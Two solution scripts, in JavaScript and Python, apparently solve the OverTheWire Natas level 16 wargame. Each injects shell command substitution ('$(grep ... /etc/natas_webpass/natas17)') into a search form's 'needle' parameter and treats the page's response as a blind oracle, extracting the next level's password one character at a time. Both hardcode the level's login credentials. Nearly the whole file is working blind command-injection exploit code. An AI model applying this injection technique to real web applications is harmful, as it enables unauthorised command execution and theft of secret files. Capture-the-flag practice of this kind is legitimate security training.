File: OverTheWire/natas/natas16.js
(function () {
  let request = require('request'),
      url = "natas16.natas.labs.overthewire.org/",
      username = "natas16",
      password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh",
      chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
      filtered = [],
      pass = '',
      uri = `http://${username}:${password}@${url}index.php`;


  for( let i = 0; i < chars.length; i += 1 ) {
    let char = chars[i];
  request(
    {
      url: uri,
      qs: {
        needle: `$(grep ${char} /etc/natas_webpass/natas17)`,
        submit: "Search"
      }
    },(function(c,i) { return function(error, response, body) {
      if( error ) { return console.log( error ); };
      if( !body.match('iris') ) {
        filtered[i] = c;
      };
    };
    })( char, i ));
  };
  setTimeout(() => {
    let filter = filtered.join('');
    console.log( "This is the filter used: " + filter );
    let index = 0;
    recurse( index, filter );
  }, 2000);
  function recurse( index, list ) {
    let char = list[index];
    request(
      {
        url: uri,
        qs: {
          needle: `$(grep -E ^${pass}${char} /etc/natas_webpass/natas17)`,
          submit: "Search"
        }
      },(error, response, body) => {
        if( error ) { console.log( error ); };
        if( !body.match('iris') ) {
          pass += char;
          if( pass.length === 32 ) {
            console.log( pass );
            console.log( "DONE!" );
          } else {
            index = 0;
            console.log( pass );
            recurse( index, list );
          }
        } else {
          index += 1;
          recurse( index, list );
        };
      });
  };
})()

File: OverTheWire/natas/natas16.py
import requests,string
from requests.auth import HTTPBasicAuth

uri = 'http://natas16.natas.labs.overthewire.org/index.php'
# chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
chars = ''.join([string.ascii_letters,string.digits])
filtered = ''
passwd = ''

# Data = {'needle':'$(grep /etc/natas_webpass/natas17)', 'submit':'Search'}
# r = requests.post(
#         uri,
#         auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'),
#         data=Data)
# print(r)
for char in chars:
    Data = {'needle':'$(grep ' + char + ' /etc/natas_webpass/natas17)', 'submit':'Search'}
    r = requests.post(
            uri,
            auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'),
            data=Data)
    if 'iris' not in r.text:
        filtered = filtered + char
        print(filtered)

print('Done filtering chars, continuing finding the password:')
for i in range(0,32):
    for char in filtered:
        Data = {'needle' : '$(grep -E ^' + passwd + char + ' /etc/natas_webpass/natas17)',
                'submit' : 'Search'}
        r = requests.post(
            uri,
            auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'),
            data = Data)
        if 'iris' not in r.text:
            passwd = passwd + char
            print(passwd)
            break
